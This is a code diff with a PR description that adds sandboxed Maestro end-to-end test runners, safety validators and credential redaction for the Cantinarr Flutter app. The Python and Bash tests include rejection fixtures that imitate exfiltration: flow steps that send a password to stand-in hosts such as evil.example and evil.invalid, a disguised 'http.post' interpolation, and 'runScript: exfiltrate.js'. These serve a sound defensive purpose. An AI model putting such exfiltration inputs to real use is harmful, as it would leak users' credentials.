+    return 0
+  fi
+  rm -rf -- "${artifacts}"
+  return 1
+}
+
+cleanup_artifacts() {
+  local status=$?
+  trap - EXIT INT TERM
+  set +e
+  if [[ "${artifacts_sanitized}" -eq 0 && -e "${artifacts}" ]]; then
+    if ! sanitize_or_remove_artifacts; then
+      printf 'maestro flow warning: interrupted artifacts could not be redacted and were removed\n' >&2
+    fi
+  fi
+  exit "${status}"
+}
+
+trap cleanup_artifacts EXIT
+trap 'exit 130' INT
+trap 'exit 143' TERM
+
+printf 'Running %s against the private loopback lab as %s\n' "${relative}" "${MAESTRO_USERNAME}"
+set +e
+maestro --platform=web --no-ansi test \
+  --config="${ROOT_DIR}/e2e/maestro/config.yaml" \
+  --headless \
+  --screen-size=500x1400 \
+  --format=JUNIT \
+  --output="${artifacts}/report.xml" \
+  --test-output-dir="${artifacts}/debug" \
+  "${flow}" \
+  2>&1 | python3 "${SCRIPT_DIR}/redact_maestro.py" stream
+statuses=("${PIPESTATUS[@]}")
+set -e
+
+sanitize_or_remove_artifacts || {
+  die "artifacts could not be safely redacted and were deleted"
+}
+
+[[ "${statuses[1]}" -eq 0 ]] || die "console redaction failed"
+[[ "${statuses[0]}" -eq 0 ]] || die "${relative} failed; redacted artifacts: ${artifacts}"
+printf 'Passed %s; redacted JUnit/artifacts: %s\n' "${relative}" "${artifacts}"

--- a/scripts/run-maestro-lab.sh
+++ b/scripts/run-maestro-lab.sh
@@ -1,0 +1,137 @@
+#!/usr/bin/env bash
+
+set -Eeuo pipefail
+umask 077
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P)"
+readonly SCRIPT_DIR
+ROOT_DIR="$(cd "${SCRIPT_DIR}/.." && pwd -P)"
+readonly ROOT_DIR
+DEFAULT_LAB_DIR="$(cd "${ROOT_DIR}/../.." && pwd)/cantinarr-lab"
+
+suite="smoke"
+reset=0
+deploy=0
+list_only=0
+
+usage() {
+  cat <<'EOF'
+Usage: scripts/run-maestro-lab.sh [--suite smoke] [--reset] [--deploy] [--list]
+
+Runs the selected Maestro web suite against the private disposable lab. The
+lab repo defaults to ../../cantinarr-lab and can be overridden with
+CANTINARR_LAB_DIR. --deploy first builds/deploys this checkout as the lab
+candidate. --reset performs the lab's full volume reset once before the suite.
+EOF
+}
+
+die() {
+  printf 'maestro lab suite failed: %s\n' "$*" >&2
+  exit 1
+}
+
+while [[ $# -gt 0 ]]; do
+  case "$1" in
+    --suite)
+      [[ $# -ge 2 ]] || die "--suite requires a value"
+      suite="$2"
+      shift 2
+      ;;
+    --reset)
+      reset=1
+      shift
+      ;;
+    --deploy)
+      deploy=1
+      shift
+      ;;
+    --list)
+      list_only=1
+      shift
+      ;;
+    -h | --help)
+      usage
+      exit 0
+      ;;
+    *) die "unknown option: $1" ;;
+  esac
+done
+
+lab_dir="${CANTINARR_LAB_DIR:-${DEFAULT_LAB_DIR}}"
+suite_file="${ROOT_DIR}/e2e/maestro/suites.json"
+
+mapfile_cmd="$(mktemp "${TMPDIR:-/tmp}/cantinarr-maestro-suite.XXXXXX")" ||
+  die "could not create the private suite map"
+trap 'rm -f "${mapfile_cmd}"' EXIT
+python3 - "${suite_file}" "${suite}" >"${mapfile_cmd}" <<'PY'
+import json
+import pathlib
+import sys
+
+path = pathlib.Path(sys.argv[1])
+suite_name = sys.argv[2]
+data = json.loads(path.read_text())
+suite = data.get("suites", {}).get(suite_name)
+if not isinstance(suite, list) or not suite:
+    raise SystemExit(f"unknown or empty Maestro suite: {suite_name}")
+for item in suite:
+    print(f"{item['user']}\t{item['flow']}")
+PY
+
+if [[ "${list_only}" -eq 1 ]]; then
+  printf 'Suite %s:\n' "${suite}"
+  while IFS=$'\t' read -r user flow; do
+    printf '  %-16s %s\n' "${user}" "${flow}"
+  done <"${mapfile_cmd}"
+  exit 0
+fi
+
+[[ -x "${lab_dir}/scripts/lab" ]] ||
+  die "private lab repo not found at ${lab_dir}; set CANTINARR_LAB_DIR"
+python3 "${SCRIPT_DIR}/check_test_automation.py" >/dev/null ||
+  die "Maestro suite failed the local safety validator"
+
+# A fresh loopback origin keeps Chromium from reusing a Flutter service worker
+# or cached bundle from an earlier candidate deployed on the same Droplet.
+e2e_port="$(python3 - <<'PY'
+import secrets
+import socket
+
+for _ in range(100):
+    port = 20000 + secrets.randbelow(40000)
+    try:
+        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
+            sock.bind(("127.0.0.1", port))
+    except OSError:
+        continue
+    print(port)
+    break
+else:
+    raise SystemExit("could not find an unused loopback port")
+PY
+)"
+
+if [[ "${deploy}" -eq 1 ]]; then
+  printf 'Deploying this checkout to the scoped private lab before E2E.\n'
+  (
+    cd "${lab_dir}"
+    CANTINARR_SOURCE_DIR="${ROOT_DIR}" scripts/lab deploy
+  )
+fi
+
+first=1
+while IFS=$'\t' read -r user flow; do
+  [[ -f "${ROOT_DIR}/${flow}" ]] || die "suite flow is missing: ${flow}"
+  args=(e2e-run --user "${user}" --platform web --port "${e2e_port}")
+  if [[ "${reset}" -eq 1 && "${first}" -eq 1 ]]; then
+    args+=(--reset)
+  fi
+  args+=(-- "${SCRIPT_DIR}/run-maestro-flow.sh" "${ROOT_DIR}/${flow}")
+  (
+    cd "${lab_dir}"
+    scripts/lab "${args[@]}"
+  )
+  first=0
+done <"${mapfile_cmd}"
+
+printf 'Maestro %s suite passed against the private disposable lab.\n' "${suite}"

--- a/scripts/tests/maestro-runner-test.sh
+++ b/scripts/tests/maestro-runner-test.sh
@@ -1,0 +1,215 @@
+#!/usr/bin/env bash
+
+set -Eeuo pipefail
+umask 077
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P)"
+readonly SCRIPT_DIR
+ROOT_DIR="$(cd "${SCRIPT_DIR}/../.." && pwd -P)"
+readonly ROOT_DIR
+FLOW="${ROOT_DIR}/e2e/maestro/flows/auth/password-login.yaml"
+readonly FLOW
+
+fail() {
+  printf 'maestro runner test failed: %s\n' "$*" >&2
+  exit 1
+}
+
+sandbox="$(mktemp -d "${TMPDIR:-/tmp}/cantinarr-maestro-runner-test.XXXXXX")"
+trap 'rm -rf -- "${sandbox}"' EXIT
+
+expect_url_rejected() {
+  local value="$1"
+  local output
+  local status
+  set +e
+  output="$(
+    MAESTRO_SERVER_URL="${value}" \
+      MAESTRO_USERNAME=lab-admin-b \
+      MAESTRO_PASSWORD=test-secret \
+      /bin/bash "${ROOT_DIR}/scripts/run-maestro-flow.sh" "${FLOW}" 2>&1
+  )"
+  status=$?
+  set -e
+  [[ "${status}" -ne 0 ]] || fail "unsafe URL was accepted: ${value}"
+  [[ "${output}" == *"invalid Maestro loopback URL"* ]] ||
+    fail "unsafe URL did not fail at the loopback guard: ${value}"
+}
+
+expect_url_rejected "http://127.0.0.1:18585@evil.example"
+expect_url_rejected "http://example.invalid:18585"
+expect_url_rejected "https://127.0.0.1:18585"
+expect_url_rejected "http://127.0.0.1:18585/path"
+expect_url_rejected "-h"
+expect_url_rejected "--help"
+
+suite_tmp="${sandbox}/suite-tmp"
+mkdir -p "${suite_tmp}"
+list_output="$(
+  CANTINARR_LAB_DIR="${sandbox}/missing-lab" TMPDIR="${suite_tmp}" \
+    /bin/bash "${ROOT_DIR}/scripts/run-maestro-lab.sh" --list
+)"
+[[ "${list_output}" == *"Suite smoke:"* ]] || fail "suite list output is missing"
+for expected in \
+  'lab-admin-b      e2e/maestro/flows/auth/password-login.yaml' \
+  'lab-admin-b      e2e/maestro/flows/navigation/admin-modules.yaml' \
+  'lab-no-grants    e2e/maestro/flows/authorization/requester-navigation.yaml'; do
+  [[ "${list_output}" == *"${expected}"* ]] || fail "suite list is missing ${expected}"
+done
+[[ -z "$(find "${suite_tmp}" -mindepth 1 -print -quit)" ]] ||
+  fail "private suite map was not removed"
+
+unknown_tmp="${sandbox}/unknown-tmp"
+mkdir -p "${unknown_tmp}"
+set +e
+CANTINARR_LAB_DIR="${sandbox}/missing-lab" TMPDIR="${unknown_tmp}" \
+  /bin/bash "${ROOT_DIR}/scripts/run-maestro-lab.sh" --suite missing --list \
+  >/dev/null 2>&1
+unknown_status=$?
+set -e
+[[ "${unknown_status}" -ne 0 ]] || fail "unknown suite unexpectedly succeeded"
+[[ -z "$(find "${unknown_tmp}" -mindepth 1 -print -quit)" ]] ||
+  fail "unknown suite left its private suite map behind"
+
+race_tmp="${sandbox}/race-tmp"
+victim="${sandbox}/mktemp-victim"
+gate="${sandbox}/mktemp-gate"
+mkdir -p "${race_tmp}"
+printf 'do-not-truncate\n' >"${victim}"
+mkfifo "${gate}"
+CANTINARR_LAB_DIR="${sandbox}/missing-lab" TMPDIR="${race_tmp}" \
+  /bin/bash -c 'read -r _; exec /bin/bash "$1" --list' _ \
+  "${ROOT_DIR}/scripts/run-maestro-lab.sh" <"${gate}" >/dev/null &
+list_pid=$!
+ln -s "${victim}" "${race_tmp}/cantinarr-maestro-suite-${list_pid}"
+printf 'continue\n' >"${gate}"
+wait "${list_pid}"
+[[ "$(cat "${victim}")" == "do-not-truncate" ]] ||
+  fail "suite-map creation followed a predictable symlink"
+rm -f "${race_tmp}/cantinarr-maestro-suite-${list_pid}"
+
+fixture="${sandbox}/fixture"
+fake_bin="${sandbox}/bin"
+fixture_flow="${fixture}/e2e/maestro/flows/auth/password-login.yaml"
+mkdir -p "${fixture}/scripts" "$(dirname "${fixture_flow}")" "${fake_bin}"
+cp "${ROOT_DIR}/scripts/run-maestro-flow.sh" \
+  "${ROOT_DIR}/scripts/check_test_automation.py" \
+  "${ROOT_DIR}/scripts/redact_maestro.py" \
+  "${ROOT_DIR}/scripts/maestro_safety.py" \
+  "${fixture}/scripts/"
+cp "${FLOW}" "${fixture_flow}"
+cp "${ROOT_DIR}/e2e/maestro/config.yaml" "${fixture}/e2e/maestro/config.yaml"
+
+outside_flow="${sandbox}/outside-flow.yaml"
+printf '%s\n' '- launchApp' >"${outside_flow}"
+symlink_flow="${fixture}/e2e/maestro/flows/auth/symlink.yaml"
+ln -s "${outside_flow}" "${symlink_flow}"
+set +e
+symlink_output="$(
+  /bin/bash "${fixture}/scripts/run-maestro-flow.sh" "${symlink_flow}" 2>&1
+)"
+symlink_status=$?
+set -e
+[[ "${symlink_status}" -ne 0 ]] || fail "symlinked flow was accepted"
+[[ "${symlink_output}" == *"flow must not be a symlink"* ]] ||
+  fail "symlinked flow did not fail at containment check"
+
+cat >"${fake_bin}/java" <<'EOF'
+#!/usr/bin/env bash
+printf 'openjdk version "21.0.1"\n' >&2
+EOF
+cat >"${fake_bin}/maestro" <<'EOF'
+#!/usr/bin/env bash
+set -Eeuo pipefail
+if [[ "${1:-}" == "--version" ]]; then
+  printf 'Maestro CLI 2.6.1\n'
+  exit 0
+fi
+output=''
+debug=''
+for argument in "$@"; do
+  case "${argument}" in
+    --output=*) output="${argument#--output=}" ;;
+    --test-output-dir=*) debug="${argument#--test-output-dir=}" ;;
+  esac
+done
+[[ -n "${output}" && -n "${debug}" ]]
+mkdir -p "$(dirname "${output}")" "${debug}"
+printf '<password>%s</password>\n' "${MAESTRO_PASSWORD}" >"${output}"
+printf '{"password":"%s"}\n' "${MAESTRO_PASSWORD}" >"${debug}/commands.json"
+if [[ "${FAKE_MAESTRO_SECRET_FILENAME:-0}" -eq 1 ]]; then
+  printf 'unsafe filename\n' >"${debug}/${MAESTRO_PASSWORD}.txt"
+fi
+if [[ "${FAKE_MAESTRO_INTERRUPT:-0}" -eq 1 ]]; then
+  kill -TERM "${PPID}"
+  sleep 1
+fi
+EOF
+chmod 0700 "${fake_bin}/java" "${fake_bin}/maestro"
+
+unsupported_bin="${sandbox}/unsupported-bin"
+fallback_jdk="${sandbox}/openjdk@21"
+mkdir -p "${unsupported_bin}" \
+  "${fallback_jdk}/libexec/openjdk.jdk/Contents/Home/bin"
+cat >"${unsupported_bin}/java" <<'EOF'
+#!/usr/bin/env bash
+printf 'openjdk version "22.0.1"\n' >&2
+EOF
+cat >"${unsupported_bin}/brew" <<'EOF'
+#!/usr/bin/env bash
+[[ "${1:-}" == "--prefix" && "${2:-}" == "openjdk@21" ]]
+printf '%s\n' "${FAKE_BREW_PREFIX}"
+EOF
+cat >"${fallback_jdk}/libexec/openjdk.jdk/Contents/Home/bin/java" <<'EOF'
+#!/usr/bin/env bash
+printf 'openjdk version "21.0.1"\n' >&2
+EOF
+chmod 0700 "${unsupported_bin}/java" "${unsupported_bin}/brew" \
+  "${fallback_jdk}/libexec/openjdk.jdk/Contents/Home/bin/java"
+
+PATH="${unsupported_bin}:${fake_bin}:${PATH}" \
+  FAKE_BREW_PREFIX="${fallback_jdk}" \
+  MAESTRO_SERVER_URL=http://127.0.0.1:18585 \
+  MAESTRO_USERNAME=lab-admin-b \
+  MAESTRO_PASSWORD=fallback-test-secret \
+  /bin/bash "${fixture}/scripts/run-maestro-flow.sh" "${fixture_flow}" >/dev/null
+
+secret='generated-test-password'
+PATH="${fake_bin}:${PATH}" \
+  MAESTRO_SERVER_URL=http://127.0.0.1:18585 \
+  MAESTRO_USERNAME=lab-admin-b \
+  MAESTRO_PASSWORD="${secret}" \
+  /bin/bash "${fixture}/scripts/run-maestro-flow.sh" "${fixture_flow}" >/dev/null
+if grep -R -F -q -- "${secret}" "${fixture}/e2e/maestro/.artifacts"; then
+  fail "normal completion retained the raw password"
+fi
+
+set +e
+PATH="${fake_bin}:${PATH}" \
+  FAKE_MAESTRO_INTERRUPT=1 \
+  MAESTRO_SERVER_URL=http://127.0.0.1:18585 \
+  MAESTRO_USERNAME=lab-admin-b \
+  MAESTRO_PASSWORD="${secret}" \
+  /bin/bash "${fixture}/scripts/run-maestro-flow.sh" "${fixture_flow}" >/dev/null 2>&1
+interrupt_status=$?
+set -e
+[[ "${interrupt_status}" -ne 0 ]] || fail "interrupted runner returned success"
+if grep -R -F -q -- "${secret}" "${fixture}/e2e/maestro/.artifacts"; then
+  fail "interrupted completion retained the raw password"
+fi
+
+set +e
+PATH="${fake_bin}:${PATH}" \
+  FAKE_MAESTRO_SECRET_FILENAME=1 \
+  MAESTRO_SERVER_URL=http://127.0.0.1:18585 \
+  MAESTRO_USERNAME=lab-admin-b \
+  MAESTRO_PASSWORD="${secret}" \
+  /bin/bash "${fixture}/scripts/run-maestro-flow.sh" "${fixture_flow}" >/dev/null 2>&1
+filename_status=$?
+set -e
+[[ "${filename_status}" -ne 0 ]] || fail "secret-bearing artifact filename was retained"
+if [[ "$(find "${fixture}/e2e/maestro/.artifacts" -print)" == *"${secret}"* ]]; then
+  fail "failed redaction left a secret-bearing artifact path"
+fi
+
+printf 'maestro runner tests passed\n'

--- a/scripts/tests/test_e2e_automation.py
+++ b/scripts/tests/test_e2e_automation.py
@@ -1,0 +1,275 @@
+from __future__ import annotations
+
+import io
+import os
+import sys
+import tempfile
+from pathlib import Path
+import unittest
+from unittest import mock
+
+
+SCRIPTS_DIR = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(SCRIPTS_DIR))
+
+import check_test_automation as automation  # noqa: E402
+import maestro_safety  # noqa: E402
+import redact_maestro  # noqa: E402
+
+
+class LoopbackURLTests(unittest.TestCase):
+    def test_accepts_explicit_loopback_http_origins(self) -> None:
+        for value in ("http://127.0.0.1:18585", "http://localhost:1"):
+            with self.subTest(value=value):
+                maestro_safety.validate_loopback_http_url(value)
+
+    def test_rejects_ambiguous_or_non_loopback_urls(self) -> None:
+        values = (
+            "https://127.0.0.1:18585",
+            "http://example.invalid:18585",
+            "http://127.0.0.1:18585@evil.example",
+            "http://localhost:18585.evil.example",
+            "http://127.0.0.1",
+            "http://127.0.0.1:",
+            "http://127.0.0.1:0",
+            "http://127.0.0.1:65536",
+            "http://127.0.0.1:not-a-port",
+            "http://127.0.0.1:18585/",
+            "http://127.0.0.1:18585?next=//evil.example",
+            "http://127.0.0.1:18585?",
+            "http://127.0.0.1:18585#fragment",
+            "http://127.0.0.1:18585#",
+            "http://127.0.0.1:18585?#",
+            "http://127.0.0.1:18585\nhttps://evil.example",
+        )
+        for value in values:
+            with self.subTest(value=value):
+                with self.assertRaises(maestro_safety.SafetyError):
+                    maestro_safety.validate_loopback_http_url(value)
+
+    def test_requires_exact_local_only_maestro_config(self) -> None:
+        with tempfile.TemporaryDirectory() as raw:
+            config = Path(raw) / "config.yaml"
+            config.write_text(maestro_safety.EXPECTED_MAESTRO_CONFIG)
+            maestro_safety.validate_maestro_config(config)
+
+            config.write_text(
+                maestro_safety.EXPECTED_MAESTRO_CONFIG
+                + "onFlowStart:\n  - runScript: exfiltrate.js\n"
+            )
+            with self.assertRaises(maestro_safety.SafetyError):
+                maestro_safety.validate_maestro_config(config)
+
+
+class FlowSafetyTests(unittest.TestCase):
+    def setUp(self) -> None:
+        self.temporary = tempfile.TemporaryDirectory()
+        self.root = Path(self.temporary.name).resolve()
+        self.flow = self.root / "e2e" / "maestro" / "flows" / "test.yaml"
+        self.helpers = self.root / "e2e" / "maestro" / "helpers"
+        self.flow.parent.mkdir(parents=True)
+        self.helpers.mkdir(parents=True)
+        self.root_patch = mock.patch.object(automation, "ROOT", self.root)
+        self.helpers_patch = mock.patch.object(automation, "HELPERS_DIR", self.helpers)
+        self.root_patch.start()
+        self.helpers_patch.start()
+
+    def tearDown(self) -> None:
+        self.helpers_patch.stop()
+        self.root_patch.stop()
+        self.temporary.cleanup()
+
+    def write_flow(self, body: str) -> None:
+        self.flow.write_text(
+            "url: ${MAESTRO_SERVER_URL}\n"
+            "name: Safety fixture\n"
+            "tags:\n"
+            "  - lab\n"
+            "---\n"
+            "- inputText: ${MAESTRO_USERNAME}\n"
+            "- inputText: ${MAESTRO_PASSWORD}\n"
+            f"{body}"
+        )
+
+    def assert_rejected(self, body: str) -> None:
+        self.write_flow(body)
+        with self.assertRaises(automation.ValidationError):
+            automation.validate_flow(self.flow)
+
+    def test_accepts_inline_conditional_subflow(self) -> None:
+        self.write_flow(
+            "- launchApp\n"
+            "- runFlow:\n"
+            "    when:\n"
+            "      visible: Safe label\n"
+            "    commands:\n"
+            "      - tapOn: Safe label\n"
+        )
+        automation.validate_flow(self.flow)
+
+    def test_accepts_and_validates_repository_helper(self) -> None:
+        helper = self.helpers / "scroll.yaml"
+        helper.write_text(
+            "- repeat:\n"
+            "    times: 2\n"
+            "    commands:\n"
+            "      - runFlow:\n"
+            "          when:\n"
+            "            notVisible:\n"
+            "              id: ${TARGET_ID}\n"
+            "          commands:\n"
+            "            - swipe:\n"
+            "                start: 10%,70%\n"
+            "                end: 10%,60%\n"
+        )
+        self.write_flow("- runFlow: ../helpers/scroll.yaml\n")
+        automation.validate_flow(self.flow)
+
+    def test_rejects_exfiltration_capable_commands(self) -> None:
+        bodies = (
+            "- openLink: //example.invalid/${MAESTRO_PASSWORD}\n",
+            "- runScript: scripts/exfiltrate.js\n",
+            "- addMedia: /tmp/private-file\n",
+            "- assertWithAI: Read this screen\n",
+            "- assertNoDefectsWithAI\n",
+            "- extractTextWithAI: Read this screen\n",
+            "- launchApp:\n    appId: https:${MAESTRO_PASSWORD}//example.invalid\n",
+            '- "openLink": //example.invalid/${MAESTRO_PASSWORD}\n',
+            '- {openLink: "//example.invalid/${MAESTRO_PASSWORD}"}\n',
+            '- {runScript: scripts/exfiltrate.js}\n',
+            '- "runScript": scripts/exfiltrate.js\n',
+            "-\n  runScript: scripts/exfiltrate.js\n",
+            '- "launchApp":\n    appId: other-target\n',
+            "- evalScript: ${MAESTRO_PASSWORD}\n",
+            "- copyTextFrom: Password\n",
+        )
+        for body in bodies:
+            with self.subTest(body=body):
+                self.assert_rejected(body)
+
+    def test_rejects_external_file_subflows(self) -> None:
+        outside = self.root / "outside.yaml"
+        outside.write_text("- tapOn: Unsafe\n")
+        bodies = (
+            "- runFlow: ../../../outside.yaml\n",
+            "- runFlow:\n    file: ../../../outside.yaml\n",
+            '- runFlow:\n    "file": ../../../outside.yaml\n',
+        )
+        for body in bodies:
+            with self.subTest(body=body):
+                self.assert_rejected(body)
+
+    def test_rejects_password_interpolation_outside_input_text(self) -> None:
+        bodies = (
+            "- tapOn:\n    id: ${MAESTRO_PASSWORD}\n",
+            "- assertVisible: ${MAESTRO_PASSWORD}\n",
+            "- inputText: prefix-${MAESTRO_PASSWORD}\n",
+            "- runFlow:\n    env:\n      TARGET_ID: ${MAESTRO_PASSWORD}\n    commands:\n      - tapOn: Safe\n",
+            "- assertVisible: ${http.post('ht' + 'tps://evil.invalid', MAESTRO_PASSWORD)}\n",
+            "- assertVisible: ${HOME}\n",
+        )
+        for body in bodies:
+            with self.subTest(body=body):
+                self.assert_rejected(body)
+
+    def test_rejects_password_interpolation_in_header(self) -> None:
+        self.flow.write_text(
+            "url: ${MAESTRO_SERVER_URL}\n"
+            "name: Safety fixture\n"
+            "tags:\n"
+            "  - lab\n"
+            "env:\n"
+            "  LEAK: ${MAESTRO_PASSWORD}\n"
+            "---\n"
+            "- inputText: ${MAESTRO_USERNAME}\n"
+        )
+        with self.assertRaises(automation.ValidationError):
+            automation.validate_flow(self.flow)
+
+    def test_rejects_header_target_overrides(self) -> None:
+        headers = (
+            "url: https://evil.invalid",
+            "appId: https://evil.invalid",
+        )
+        for override in headers:
+            with self.subTest(override=override):
+                self.flow.write_text(
+                    "url: ${MAESTRO_SERVER_URL}\n"
+                    "name: Safety fixture\n"
+                    "tags:\n"
+                    "  - lab\n"
+                    f"{override}\n"
+                    "---\n"
+                    "- inputText: ${MAESTRO_USERNAME}\n"
+                    "- inputText: ${MAESTRO_PASSWORD}\n"
+                )
+                with self.assertRaises(automation.ValidationError):
+                    automation.validate_flow(self.flow)
+
+    def test_rejects_symlinked_flow(self) -> None:
+        target = self.root / "outside-flow.yaml"
+        self.write_flow("- launchApp\n")
+        self.flow.replace(target)
+        self.flow.symlink_to(target)
+        with self.assertRaises(automation.ValidationError):
+            automation.validate_flow(self.flow)
+
+
+class RedactionTests(unittest.TestCase):
+    def test_sanitizes_text_and_binary_artifacts(self) -> None:
+        secret = "generated-lab-password"
+        with tempfile.TemporaryDirectory() as raw:
+            root = Path(raw)
+            text_artifact = root / "commands.json"
+            binary_artifact = root / "screenshot.bin"
+            text_artifact.write_text(f'{{"password":"{secret}"}}')
+            binary_artifact.write_bytes(b"prefix\x00" + secret.encode() + b"\xffsuffix")
+
+            self.assertEqual(redact_maestro.sanitize_tree(root, [secret]), 0)
+
+            self.assertNotIn(secret.encode(), text_artifact.read_bytes())
+            self.assertNotIn(secret.encode(), binary_artifact.read_bytes())
+            self.assertIn(redact_maestro.REDACTION.encode(), text_artifact.read_bytes())
+            self.assertIn(redact_maestro.REDACTION.encode(), binary_artifact.read_bytes())
+
+    def test_stream_redacts_repeated_and_non_newline_occurrences(self) -> None:
+        source = io.StringIO("secret once secret\nfinal-secret")
+        destination = io.StringIO()
+        with mock.patch.object(sys, "stdin", source), mock.patch.object(sys, "stdout", destination):
+            self.assertEqual(redact_maestro.stream(["secret"]), 0)
+        self.assertEqual(
+            destination.getvalue(),
+            f"{redact_maestro.REDACTION} once {redact_maestro.REDACTION}\n"
+            f"final-{redact_maestro.REDACTION}",
+        )
+
+    def test_cli_requires_a_nonempty_password(self) -> None:
+        with mock.patch.dict(os.environ, {}, clear=True), mock.patch.object(
+            sys, "argv", ["redact_maestro.py", "stream"]
+        ), mock.patch.object(sys, "stderr", io.StringIO()):
+            self.assertEqual(redact_maestro.main(), 2)
+
+    def test_rejects_artifact_symlink_without_touching_target(self) -> None:
+        secret = "generated-lab-password"
+        with tempfile.TemporaryDirectory() as raw:
+            root = Path(raw) / "artifacts"
+            root.mkdir()
+            target = Path(raw) / "outside.txt"
+            target.write_text(secret)
+            (root / "linked.txt").symlink_to(target)
+
+            with self.assertRaises(RuntimeError):
+                redact_maestro.sanitize_tree(root, [secret])
+            self.assertEqual(target.read_text(), secret)
+
+    def test_rejects_secret_bearing_artifact_filename(self) -> None:
+        secret = "generated-lab-password"
+        with tempfile.TemporaryDirectory() as raw:
+            root = Path(raw)
+            (root / f"failure-{secret}.txt").write_text("safe contents")
+            with self.assertRaises(RuntimeError):
+                redact_maestro.sanitize_tree(root, [secret])
+
+
+if __name__ == "__main__":
+    unittest.main()


### PR DESCRIPTION
## What changed

- validate the 584-case master catalog against explicit automated and partial proof mappings
- add three local Maestro web flows for password authentication and admin/requester navigation boundaries
- add fail-closed flow validation, loopback URL enforcement, exact Maestro/Java pinning, credential redaction, and ignored private artifacts
- add lab-build-only Flutter semantics selectors while preserving production accessibility behavior
- wire the catalog/tooling gate into CI and document the Maestro/Patrol layer boundary

## Coverage

- `AUTH-007`: complete automated proof
- `AUTH-022`, `NAV-001`, `NAV-003`: honest partial proofs
- search is explicitly not claimed because Maestro web cannot reliably inject text into Flutter's hidden editing element

## Validation

- `flutter analyze --no-fatal-infos`
- `flutter test` (342 passed)
- `flutter build web --release`
- `go vet ./...` and `go test ./...`
- `make check-test-automation` (16 Python tests plus Bash black-box runner tests)
- complete live `make maestro-lab-smoke`: AUTH-007, admin inventory, and requester boundary all passed
- full 17-service lab deploy, smoke, fixture, and network-isolation audit

Companion private-lab runner: https://github.com/windoze95/cantinarr-lab/pull/2